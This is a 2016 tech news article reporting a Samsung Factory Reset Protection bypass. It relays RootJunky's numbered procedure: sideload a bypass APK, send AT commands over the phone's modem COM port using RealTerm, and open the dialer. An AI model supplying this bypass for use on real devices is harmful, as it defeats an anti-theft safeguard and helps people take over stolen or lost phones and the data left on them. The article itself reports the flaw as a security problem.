Aug 12th, 2016

Another security nightmare has surfaced for Samsung. The company’s smartphones (as were many others’, including Nexus phones) were under fire earlier this year when it was discovered you could bypass the factory reset protection feature without having the Google account credentials for the previous phone owner.

While that exploit was eventually fixed, another one has surfaced that shows it’s possible to crack into several protected Samsung devices — including the Samsung Galaxy S6, S6 Edge, S6 Edg Plus, S6 Active, Note 5, S7, S7 Edge, and S7 Active — with a little bit of work. But before we give you the full rundown, let’s review factory reset protection (or FRP, as we’ll calling it for the rest of this article) and what it does.

What is Factory Reset Protection?

Factory Reset Protection, or FRP, is a new feature of Android’s as of the Android 5.0 Lollipop release. In simple terms, FRP requires you to input the last-known associated Google account credentials to access the phone whenever it is factory reset.

This option was put in place to prevent unwanted people from accessing a phone after factory resetting it, which is useful for a couple of different reasons:

  • When a factory reset is performed, depending on how it was performed, some data is not always erased. For instance, the partition of the phone’s storage where your photos and videos are stored may persist even after a factory reset. This is great for those who want to protect their personal files in the event that they lose their phone.
  • It makes the phone virtually unusable: what good is a stolen or lost phone that no one can get into? Of course, those with the technical know-how can get around that anyway, but for those who don’t have that knowledge, it keeps them at bay.

It’s designed to help keep your private life private in the event that you can’t ever get your phone back.

Bypassing FRP on Samsung’s phones

Samsung-Galaxy-S7-Edge (5)

So, those who do want to bypass it now have an easy (if not slightly involved) way to do that, and all it requires is the ability to follow instructions. Rootjunky — who brought to light this exploit and the one that arose back in January — lays it all out straight ahead.

Here’s what you’ll need:

  • The phone
  • A Windows Computer
  • The ability to follow directions

Good to go? Here’s what you’ll need to do:

  1. Download and install the RealTerm program.
  2. Download and copy com.rootjunky.frpbypass-1.0.apk to the device’s microSD card or internal storage
  3. Start the phone and connect it to WIFI.
  4. Plug the phone into your computer with your USB cable.
  5. Start RealTerm on your computer and under “Display” check the box “HALF DUPLEX.”
  6. Right click on “My Computer” and select “manage.” Once it opens, click “Device Manager,” then “Modems.”
  7. Under Modems you should see a Samsung device. Right click it, then select “Properties.”
  8. Once the properties window opens, select the “Modem” tab and see what port your device is on. For example, it may show up under “com5.”)
  9. Now that you know the com port number, close all DEvice Manager windows and open RealTerm again.
  10. Under the ports tab in RealTerm enter your port number, then click “Change.”
  11. Next, click the “Send” tab. you will need to send these two commands, in order, with the “Send ASCII” button:
    1. first at+creg?\r\n
    2. then atd1234;\r\n
  12. Look at your phone and the dailer will pop up.

From there, all you’ll need to do is mimick what you see in the video straight ahead.

When will Samsung fix it?

As you can see, the method is a lot more complicated to pull off than the previous one was, but it’s achievable all the same, and that’s a pretty big problem. Samsung is surely going to want to get a handle on this one just as fast as they did before, so we’ll be dropping a line into the company to see if they’re aware and whether a fix is on the way.

[via RootJunky]